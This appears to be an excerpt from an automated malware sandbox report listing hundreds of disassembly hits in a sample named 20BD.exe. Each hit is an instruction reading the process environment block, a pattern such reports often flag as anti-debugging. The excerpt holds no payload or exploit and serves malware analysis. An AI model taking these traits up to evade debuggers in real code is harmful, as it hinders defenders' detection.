Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF mov eax, dword ptr fs:[00000030h]	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9D294 mov eax, dword ptr fs:[00000030h]	20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9D294 mov eax, dword ptr fs:[00000030h]	20_2_6AB9D294
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h]	20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h]	20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65AC0 mov eax, dword ptr fs:[00000030h]	20_2_6AB65AC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63ACA mov eax, dword ptr fs:[00000030h]	20_2_6AB63ACA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h]	20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h]	20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB68239 mov eax, dword ptr fs:[00000030h]	20_2_6AB68239
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A229 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A229
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64A20 mov eax, dword ptr fs:[00000030h]	20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64A20 mov eax, dword ptr fs:[00000030h]	20_2_6AB64A20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABEEA20 mov eax, dword ptr fs:[00000030h]	20_2_6ABEEA20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1B260 mov eax, dword ptr fs:[00000030h]	20_2_6AC1B260
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1B260 mov eax, dword ptr fs:[00000030h]	20_2_6AC1B260
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38A62 mov eax, dword ptr fs:[00000030h]	20_2_6AC38A62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB83A1C mov eax, dword ptr fs:[00000030h]	20_2_6AB83A1C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h]	20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65210 mov ecx, dword ptr fs:[00000030h]	20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h]	20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65210 mov eax, dword ptr fs:[00000030h]	20_2_6AB65210
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB78A0A mov eax, dword ptr fs:[00000030h]	20_2_6AB78A0A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA927A mov eax, dword ptr fs:[00000030h]	20_2_6ABA927A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF4257 mov eax, dword ptr fs:[00000030h]	20_2_6ABF4257
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h]	20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h]	20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h]	20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69240 mov eax, dword ptr fs:[00000030h]	20_2_6AB69240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62240 mov ecx, dword ptr fs:[00000030h]	20_2_6AB62240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB62240 mov eax, dword ptr fs:[00000030h]	20_2_6AB62240
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF4248 mov eax, dword ptr fs:[00000030h]	20_2_6ABF4248
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h]	20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h]	20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94BAD mov eax, dword ptr fs:[00000030h]	20_2_6AB94BAD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC123E3 mov ecx, dword ptr fs:[00000030h]	20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC123E3 mov ecx, dword ptr fs:[00000030h]	20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC123E3 mov eax, dword ptr fs:[00000030h]	20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB64B94 mov edi, dword ptr fs:[00000030h]	20_2_6AB64B94
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB623F6 mov eax, dword ptr fs:[00000030h]	20_2_6AB623F6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2138A mov eax, dword ptr fs:[00000030h]	20_2_6AC2138A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC0EB8A mov ecx, dword ptr fs:[00000030h]	20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h]	20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h]	20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC0EB8A mov eax, dword ptr fs:[00000030h]	20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB61BE9 mov eax, dword ptr fs:[00000030h]	20_2_6AB61BE9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21BA8 mov eax, dword ptr fs:[00000030h]	20_2_6AC21BA8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38BB6 mov eax, dword ptr fs:[00000030h]	20_2_6AC38BB6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC39BBE mov eax, dword ptr fs:[00000030h]	20_2_6AC39BBE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38B58 mov eax, dword ptr fs:[00000030h]	20_2_6AC38B58
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF4320 mov eax, dword ptr fs:[00000030h]	20_2_6ABF4320
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B7A mov eax, dword ptr fs:[00000030h]	20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B7A mov eax, dword ptr fs:[00000030h]	20_2_6AB93B7A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2131B mov eax, dword ptr fs:[00000030h]	20_2_6AC2131B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h]	20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h]	20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h]	20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB93B5A mov eax, dword ptr fs:[00000030h]	20_2_6AB93B5A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F340 mov eax, dword ptr fs:[00000030h]	20_2_6AB6F340
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6DB40 mov eax, dword ptr fs:[00000030h]	20_2_6AB6DB40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h]	20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h]	20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h]	20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h]	20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h]	20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6E8B0 mov eax, dword ptr fs:[00000030h]	20_2_6AB6E8B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9F0BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9F0BF mov eax, dword ptr fs:[00000030h]	20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9F0BF mov eax, dword ptr fs:[00000030h]	20_2_6AB9F0BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABA90AF mov eax, dword ptr fs:[00000030h]	20_2_6ABA90AF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h]	20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h]	20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h]	20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728AE mov ecx, dword ptr fs:[00000030h]	20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h]	20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728AE mov eax, dword ptr fs:[00000030h]	20_2_6AB728AE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63880 mov eax, dword ptr fs:[00000030h]	20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63880 mov eax, dword ptr fs:[00000030h]	20_2_6AB63880
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3884 mov eax, dword ptr fs:[00000030h]	20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABE3884 mov eax, dword ptr fs:[00000030h]	20_2_6ABE3884
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h]	20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h]	20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB728FD mov eax, dword ptr fs:[00000030h]	20_2_6AB728FD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h]	20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h]	20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB640E1 mov eax, dword ptr fs:[00000030h]	20_2_6AB640E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB658EC mov eax, dword ptr fs:[00000030h]	20_2_6AB658EC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B8E4 mov eax, dword ptr fs:[00000030h]	20_2_6AB8B8E4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8B8E4 mov eax, dword ptr fs:[00000030h]	20_2_6AB8B8E4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h]	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 mov ecx, dword ptr fs:[00000030h]	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h]	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h]	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h]	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABFB8D0 mov eax, dword ptr fs:[00000030h]	20_2_6ABFB8D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB670C0 mov eax, dword ptr fs:[00000030h]	20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB670C0 mov eax, dword ptr fs:[00000030h]	20_2_6AB670C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A830 mov eax, dword ptr fs:[00000030h]	20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94020 mov edi, dword ptr fs:[00000030h]	20_2_6AB94020
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h]	20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h]	20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h]	20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7B02A mov eax, dword ptr fs:[00000030h]	20_2_6AB7B02A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F018 mov eax, dword ptr fs:[00000030h]	20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6F018 mov eax, dword ptr fs:[00000030h]	20_2_6AB6F018
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC22073 mov eax, dword ptr fs:[00000030h]	20_2_6AC22073
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h]	20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h]	20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66800 mov eax, dword ptr fs:[00000030h]	20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB78800 mov eax, dword ptr fs:[00000030h]	20_2_6AB78800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8F86D mov eax, dword ptr fs:[00000030h]	20_2_6AB8F86D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC34015 mov eax, dword ptr fs:[00000030h]	20_2_6AC34015
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC34015 mov eax, dword ptr fs:[00000030h]	20_2_6AC34015
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3F019 mov eax, dword ptr fs:[00000030h]	20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC3F019 mov eax, dword ptr fs:[00000030h]	20_2_6AC3F019
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB67055 mov eax, dword ptr fs:[00000030h]	20_2_6AB67055
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65050 mov eax, dword ptr fs:[00000030h]	20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65050 mov eax, dword ptr fs:[00000030h]	20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB65050 mov eax, dword ptr fs:[00000030h]	20_2_6AB65050
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov ecx, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF mov eax, dword ptr fs:[00000030h]	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB961A0 mov eax, dword ptr fs:[00000030h]	20_2_6AB961A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB961A0 mov eax, dword ptr fs:[00000030h]	20_2_6AB961A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC389E7 mov eax, dword ptr fs:[00000030h]	20_2_6AC389E7
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6519E mov eax, dword ptr fs:[00000030h]	20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6519E mov ecx, dword ptr fs:[00000030h]	20_2_6AB6519E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB94190 mov eax, dword ptr fs:[00000030h]	20_2_6AB94190
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8C182 mov eax, dword ptr fs:[00000030h]	20_2_6AB8C182
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9A185 mov eax, dword ptr fs:[00000030h]	20_2_6AB9A185
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2A189 mov eax, dword ptr fs:[00000030h]	20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2A189 mov ecx, dword ptr fs:[00000030h]	20_2_6AC2A189
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB631E0 mov eax, dword ptr fs:[00000030h]	20_2_6AB631E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABF41E8 mov eax, dword ptr fs:[00000030h]	20_2_6ABF41E8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B1E1 mov eax, dword ptr fs:[00000030h]	20_2_6AB6B1E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B1E1 mov eax, dword ptr fs:[00000030h]	20_2_6AB6B1E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB6B1E1 mov eax, dword ptr fs:[00000030h]	20_2_6AB6B1E1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h]	20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h]	20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h]	20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC249A4 mov eax, dword ptr fs:[00000030h]	20_2_6AC249A4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9513A mov eax, dword ptr fs:[00000030h]	20_2_6AB9513A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9513A mov eax, dword ptr fs:[00000030h]	20_2_6AB9513A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB63138 mov ecx, dword ptr fs:[00000030h]	20_2_6AB63138
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h]	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h]	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h]	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120 mov eax, dword ptr fs:[00000030h]	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120 mov ecx, dword ptr fs:[00000030h]	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC38966 mov eax, dword ptr fs:[00000030h]	20_2_6AC38966
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB69100 mov eax, dword ptr fs:[00000030h]	20_2_6AB69100
